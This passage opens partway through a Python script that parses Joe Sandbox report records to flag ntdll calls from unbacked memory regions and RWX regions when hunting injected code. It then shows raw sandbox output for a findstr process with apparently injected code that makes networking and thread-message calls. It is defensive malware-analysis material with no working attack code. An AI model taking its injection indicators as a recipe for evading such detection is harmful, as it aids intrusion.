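    calls: list = field(default_factory=list)  # (api name, module, call-site address)


def parse_records(text: str) -> list:
    """A record starts at an 'APIs' heading; its API lines run until 'Memory Dump Source'."""
    records, cur, in_apis = [], None, False
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur, in_apis = FunctionRecord(), True
            records.append(cur)
        elif cur is None:
            continue
        elif line == "Memory Dump Source":
            in_apis = False
        elif in_apis:
            if m := API_RE.match(line):
                cur.calls.append((m["name"], m["module"], int(m["ref"], 16)))
        elif m := SOURCE_RE.search(line):
            cur.pid, cur.base = int(m["pid"], 16), int(m["base"], 16)
            cur.protect, cur.pe_backed = int(m["protect"], 16), m["pe"].lower() == "true"
        elif line.startswith("• API ID: "):
            cur.api_id = line[len("• API ID: "):]
        elif line.startswith("• Instruction Fuzzy Hash: "):
            cur.instruction_fuzzy_hash = line[len("• Instruction Fuzzy Hash: "):]
    return records


def direct_native_calls(records: list, module: str = "NTDLL") -> list:
    """ntdll calls made from regions with no PE file behind them: code there has no
    module to attribute it to, so these are the call sites to pivot on when hunting
    injected or unpacked payloads.  Returns (pid:base, api, call site, offset in region)."""
    return [(f"{r.pid}:{r.base:08X}", name, ref, ref - r.base)
            for r in records if not r.pe_backed
            for name, mod, ref in r.calls if mod.upper() == module.upper()]


def rwx_regions(records: list) -> list:
    """Distinct region bases whose (assumed) protection field is PAGE_EXECUTE_READWRITE."""
    return sorted({r.base for r in records if r.protect == PAGE_EXECUTE_READWRITE})


if __name__ == "__main__":
    recs = parse_records(SAMPLE_REPORT)
    for region, api, site, off in direct_native_calls(recs):
        print(f"{region} {api:<13} call site {site:08X} (region +{off:X})")
    print("RWX regions:", [f"{b:08X}" for b in rwx_regions(recs)])
```

Run stand-alone it lists the two ntdll call sites inside the unbacked 02E40000 region with their offsets from the region base (0x27EB3 and 0x280C7) and, under the protection-field assumption, reports both dumped bases as RWX; feeding it the full report text instead of the constructed sample gives the same pivot over every function record.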
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                 • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 987c5a07f5d4a2736e3d9f39e65ac4bed0e72656efb52db3b65e9a2cdaa4183e
                                                • Instruction ID: 782f12ac91a9acdfb90c9419026f66277d38b5bf8575eaffd213b40e60eea0af
                                                • Opcode Fuzzy Hash: 987c5a07f5d4a2736e3d9f39e65ac4bed0e72656efb52db3b65e9a2cdaa4183e
                                                • Instruction Fuzzy Hash: DB900235A05814129140B5584888546401597E0301B59C011E0424654D8B548A565361
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                 • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 7205943c6bdb6ffd1272a6efc3c201cf2fa559ddba02dfe3761964dda0cc4fbf
                                                • Instruction ID: aee726488c05c022b1d232569702089b6009de4198f88511b4d16709dbcde6ae
                                                • Opcode Fuzzy Hash: 7205943c6bdb6ffd1272a6efc3c201cf2fa559ddba02dfe3761964dda0cc4fbf
                                                • Instruction Fuzzy Hash: 51900265A01514424140B5584808406601597E1301399C115A0554660D875889559269
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                 • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: f7cf20442a74f50cb3aca6d3f8fa1d3b5c8f0f8eb710684c945493336dfcb9e4
                                                • Instruction ID: 07d9a15a2b75848966a9a17f193c5950514a6b5cbff76b47aa48ac70d005cfc8
                                                • Opcode Fuzzy Hash: f7cf20442a74f50cb3aca6d3f8fa1d3b5c8f0f8eb710684c945493336dfcb9e4
                                                • Instruction Fuzzy Hash: 77900235A0551802D100B5584518706101587D0201F69C411A0424668E87D58A5165A2
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                 • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: dd39184d62a9fb7cddbca700517aaa60c6b738fc99e5c87264f6c8060ff90589
                                                • Instruction ID: 3dfb1814299b0f2d14ae69925c3286f0971f406a416adb691f0af46189af4d1a
                                                • Opcode Fuzzy Hash: dd39184d62a9fb7cddbca700517aaa60c6b738fc99e5c87264f6c8060ff90589
                                                • Instruction Fuzzy Hash: D4900265602414034105B5584418616401A87E0201B59C021E1014690EC66589916125
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                 • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 61133187a428780a1c60c5d953d3e27ebe80a8971e40ba2d104cdad27bcefa1f
                                                • Instruction ID: ed45c4e060008c39f7e12f5270b9de8177fe9e4e0a81a6a99dcba75cbdad56d3
                                                • Opcode Fuzzy Hash: 61133187a428780a1c60c5d953d3e27ebe80a8971e40ba2d104cdad27bcefa1f
                                                • Instruction Fuzzy Hash: 58900229621414020145F958060850B045597D6351399C015F1416690DC76189655321
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                 • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 21753bcb95093eea548a20209f92bff7a1f6a9bb11af0a54260d467602d64877
                                                • Instruction ID: 9a2b4f324ff23dc93872b08a22eb28a2c25b2f4d2f94f58875ed1070c679b941
                                                • Opcode Fuzzy Hash: 21753bcb95093eea548a20209f92bff7a1f6a9bb11af0a54260d467602d64877
                                                • Instruction Fuzzy Hash: 7690043D711414030105FD5C070C5070057C7D535135DC031F1015750DD771CD715131
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                 • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 6635990a984c15fb763d65f7288391658bdc5c4b9ac7616781fddb5be63802a6
                                                • Instruction ID: a60df53e288ba0e45faf2dd5b4c8c3f4a0a6013da08f0bcde8d918cebfa45bb8
                                                • Opcode Fuzzy Hash: 6635990a984c15fb763d65f7288391658bdc5c4b9ac7616781fddb5be63802a6
                                                • Instruction Fuzzy Hash: FC90022564546502D150B55C44086164015A7E0201F59C021A0814694E869589556221
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                 • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 1cf26f050c3ecec35d0102408b39828f2fd240c834dc7c36f828aabe3055d88d
                                                • Instruction ID: b3ba8f44ec1fa9e946fd00f1b56a65c644dc374f591f748dac3498f43940c112
                                                • Opcode Fuzzy Hash: 1cf26f050c3ecec35d0102408b39828f2fd240c834dc7c36f828aabe3055d88d
                                                • Instruction Fuzzy Hash: 0C90026574141842D100B5584418B060015C7E1301F59C015E1064654E8759CD526126
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                 • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a9c78c4caf50a2b861fca815aaebaadee5e6694d4fe79fe3cc00a73509add47f
                                                • Instruction ID: ba6759a0483725d925f50a6be191ff435bbd83ac34e4ca1fcc131c84fa8b83af
                                                • Opcode Fuzzy Hash: a9c78c4caf50a2b861fca815aaebaadee5e6694d4fe79fe3cc00a73509add47f
                                                • Instruction Fuzzy Hash: 1A900225611C1442D200B9684C18B07001587D0303F59C115A0154654DCA5589615521
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                 • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 14b74296d91d234c0ad3ceec31f56fb55836868f3ffa011a29b49c485a41a03e
                                                • Instruction ID: 2a821aa84619bd9c335592960aed9d9ca105de378fc4aeb0cd7d670d07b3b83e
                                                • Opcode Fuzzy Hash: 14b74296d91d234c0ad3ceec31f56fb55836868f3ffa011a29b49c485a41a03e
                                                • Instruction Fuzzy Hash: C0900225A01414424140B56888489064015ABE1211759C121A0998650E869989655665
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                 • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4adc9d5e9dae31ade3aefdffc7b93bf75070845ab71ea71ec468afea0ad6aa6c
                                                • Instruction ID: 55d0e5804fe1874976cf181d5539354b6b3ed6dacf5d47163e3acbbe040ef0fa
                                                • Opcode Fuzzy Hash: 4adc9d5e9dae31ade3aefdffc7b93bf75070845ab71ea71ec468afea0ad6aa6c
                                                • Instruction Fuzzy Hash: BA90026560181803D140B9584808607001587D0302F59C011A2064655F8B698D516135
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                 • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 03b7e9c9a29220ff67990dc64c4272a719178b80b0ac60bf62cb21fe71cd5cf8
                                                • Instruction ID: daaf83451f8e3cc892bd6b8caa402fb5c0641bd74573ac72434661fd61bd74f2
                                                • Opcode Fuzzy Hash: 03b7e9c9a29220ff67990dc64c4272a719178b80b0ac60bf62cb21fe71cd5cf8
                                                • Instruction Fuzzy Hash: 2190043570141403D140F55C541C7074015D7F1301F5DD011F0414754DDF55CD575333
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                 • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 098bd15db39e4845c62106ac2f889eee161967339651bb5fe51b7b5e39d170b9
                                                • Instruction ID: ceabb9f616f0405131e2e4eac8e667e2df06353a0075c830386ef47d0c3abb64
                                                • Opcode Fuzzy Hash: 098bd15db39e4845c62106ac2f889eee161967339651bb5fe51b7b5e39d170b9
                                                • Instruction Fuzzy Hash: 5D90022D61341402D180B558540C60A001587D1202F99D415A0015658DCA5589695321
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                 • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: dc5dedcd27de0d01b0517ee24abfe954d2c1c63b0019af024aa7e87f356b5238
                                                • Instruction ID: 2f334509fefdb1fd19e287f63ccaa0b10822f6a8af935b6be284f3cbec33dce9
                                                • Opcode Fuzzy Hash: dc5dedcd27de0d01b0517ee24abfe954d2c1c63b0019af024aa7e87f356b5238
                                                • Instruction Fuzzy Hash: 6A90023560141813D111B5584508707001987D0241F99C412A0424658E97968A52A121
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                 • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: cc8ca4681e0821ee94b98e34da0a3ef0a0429a1bd538e3b17e50ed0083c79287
                                                • Instruction ID: 875f8ffa504271fabc37927466e614b0c7f914113985a044bed9723bd69a4dc5
                                                • Opcode Fuzzy Hash: cc8ca4681e0821ee94b98e34da0a3ef0a0429a1bd538e3b17e50ed0083c79287
                                                • Instruction Fuzzy Hash: D6900225642455525545F5584408507401697E0241799C012A1414A50D86669956D621
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                 • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: c9bc93d7d0a594a1a5e9040bcb72d94d9238d92e7d0acadb69997781a309d242
                                                • Instruction ID: 3fb5564478ee46afeb895c7496e79830d53ce9a0c23553301cffe8cf531bff0f
                                                • Opcode Fuzzy Hash: c9bc93d7d0a594a1a5e9040bcb72d94d9238d92e7d0acadb69997781a309d242
                                                • Instruction Fuzzy Hash: 9A90023560141C42D100B5584408B46001587E0301F59C016A0124754E8755C9517521
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 2e10dd04c6e050c8d2afcd16fe6ca1b7c7c3873054fc9c2592c896ec68a3cf0a
                                                • Instruction ID: ff487dc972255548cebfbf598560e5691369515b85d4c7510e38022022958236
                                                • Opcode Fuzzy Hash: 2e10dd04c6e050c8d2afcd16fe6ca1b7c7c3873054fc9c2592c896ec68a3cf0a
                                                • Instruction Fuzzy Hash: EF90023560149C02D110B558840874A001587D0301F5DC411A4424758E87D589917121
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: b4274f013bc6cbaabde11135a9a1e21f938616c29a66ba78182d53b91ef18518
                                                • Instruction ID: dbbb2392169e7fc6c0d6ad7a1009f980742d64990c86c5d4f75341a3707ad538
                                                • Opcode Fuzzy Hash: b4274f013bc6cbaabde11135a9a1e21f938616c29a66ba78182d53b91ef18518
                                                • Instruction Fuzzy Hash: A390023560141802D100B998540C646001587E0301F59D011A5024655FC7A589916131

                                                • Control-flow Graph: function 2e50b17-2e50c1d; internal calls 2e6a000, 2e6aa10, 2e54530, 2e41410, 2e61350; PostThreadMessageW in block 2e50bf9-2e50c08
                                                APIs
                                                • PostThreadMessageW.USER32(H0840I45,00000111,00000000,00000000), ref: 02E50C04
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: H0840I45$H0840I45
                                                • API String ID: 1836367815-3713557624
                                                • Opcode ID: 292bbe2a202938fa1994e3e652d79ce82b208cc1dc88c93a05ebdadae550f399
                                                • Instruction ID: 903bd35f0be5de3b07b6d16806c80ac4158e6b7f38ac14ed6fb98eaff9188c1d
                                                • Opcode Fuzzy Hash: 292bbe2a202938fa1994e3e652d79ce82b208cc1dc88c93a05ebdadae550f399
                                                • Instruction Fuzzy Hash: 39118972880168BADB029B60DC45EEFFF3DEF42358F0880ADF95467141E6264E128BA1

                                                • Control-flow Graph: function 2e50b56-2e50c1d; internal calls 2e6a000, 2e6aa10, 2e54530, 2e41410, 2e61350; PostThreadMessageW in block 2e50bf9-2e50c08
                                                APIs
                                                • PostThreadMessageW.USER32(H0840I45,00000111,00000000,00000000), ref: 02E50C04
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: H0840I45$H0840I45
                                                • API String ID: 1836367815-3713557624
                                                • Opcode ID: 444b6107169246ffd9573908a4a1da656a9aeefd097e04328c094965c19b596c
                                                • Instruction ID: 59eeb6e5b8dbbcc5d3df3bbe41a88606c2e4b309407d90835cd94982657d73ec
                                                • Opcode Fuzzy Hash: 444b6107169246ffd9573908a4a1da656a9aeefd097e04328c094965c19b596c
                                                • Instruction Fuzzy Hash: D401D672D8021CBADB119AD09C81EEFBB7CDF45798F04D064FA14BB240E6355E468BA1

                                                APIs
                                                • PostThreadMessageW.USER32(H0840I45,00000111,00000000,00000000), ref: 02E50C04
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: H0840I45$H0840I45
                                                • API String ID: 1836367815-3713557624
                                                • Opcode ID: 7395cc57e385468837c358f834899843730a4a4e23915e94cf0e01754f8305ae
                                                • Instruction ID: e8a337af2ce99243604538fa71367f23d9b27d419d498dc5776f7c5ecd4cc62d
                                                • Opcode Fuzzy Hash: 7395cc57e385468837c358f834899843730a4a4e23915e94cf0e01754f8305ae
                                                • Instruction Fuzzy Hash: 3B11C871D8111C7EEB119A909C81EFFBB7CDF45698F049069FA04B7140D6355F068BA1

                                                APIs
                                                • PostThreadMessageW.USER32(H0840I45,00000111,00000000,00000000), ref: 02E50C04
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: H0840I45$H0840I45
                                                • API String ID: 1836367815-3713557624
                                                • Opcode ID: 3ae2d356b19159d8fef6f7aa4193f09caa68bff89dd37ce7b51a15b9b76d1daf
                                                • Instruction ID: 591a7ea7645d4f31513fd03223682d4c4b411ab684635abeaf6638391062b79b
                                                • Opcode Fuzzy Hash: 3ae2d356b19159d8fef6f7aa4193f09caa68bff89dd37ce7b51a15b9b76d1daf
                                                • Instruction Fuzzy Hash: 0901D6B2D8021C7ADB01AAE09C81EFFBB7CDF45698F04C064FA04B7240E6755E068BB1
                                                APIs
                                                • Sleep.KERNELBASE(000007D0), ref: 02E62CDC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: net.dll$wininet.dll
                                                • API String ID: 3472027048-1269752229
                                                • Opcode ID: 4f097e5e9a8296fd8cf24a6ac82b790e8d177638811fb9736a50721c4c582627
                                                • Instruction ID: c45a2281025e3bfc71d2ecefc5e8719d12934bbcc58b655e3b55ecf6c95c8b5b
                                                • Opcode Fuzzy Hash: 4f097e5e9a8296fd8cf24a6ac82b790e8d177638811fb9736a50721c4c582627
                                                • Instruction Fuzzy Hash: 883181B1680705BFC724DF64D884FEBBBB9AB48744F00961DFA595B245D7B0B640CBA0
                                                APIs
                                                • WSAStartup.WS2_32(00000202,?), ref: 02E51A44
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Startup
                                                • String ID: \
                                                • API String ID: 724789610-2967466578
                                                • Opcode ID: 273342268bfa830e3bd9272339ece92985735d833ff69005163a5bbd0ce7cda9
                                                • Instruction ID: d1f62c528ef2c34e39009ede692199b94fa57211da1cd9588e56640044302cb8
                                                • Opcode Fuzzy Hash: 273342268bfa830e3bd9272339ece92985735d833ff69005163a5bbd0ce7cda9
                                                • Instruction Fuzzy Hash: AA91B670E90315AFDB25DFA4C844BEEBBF5BF04748F149129F908AB240E7746644CBA1
                                                APIs
                                                • WSAStartup.WS2_32(00000202,?), ref: 02E51A44
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Startup
                                                • String ID: \
                                                • API String ID: 724789610-2967466578
                                                • Opcode ID: 082ec0c775722673c9ba18187e2d2513496b1a92863d99259c224b8c882c4d48
                                                • Instruction ID: 5d9f08769e16d941a12b3ba537bd68d63a505504a6d84111e82292af3be8b886
                                                • Opcode Fuzzy Hash: 082ec0c775722673c9ba18187e2d2513496b1a92863d99259c224b8c882c4d48
                                                • Instruction Fuzzy Hash: 4191B470D90315AFDB24DFA4C845BEEBBF5BF04748F149129F908AB240E7746684CBA1
                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 02E5ECC7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
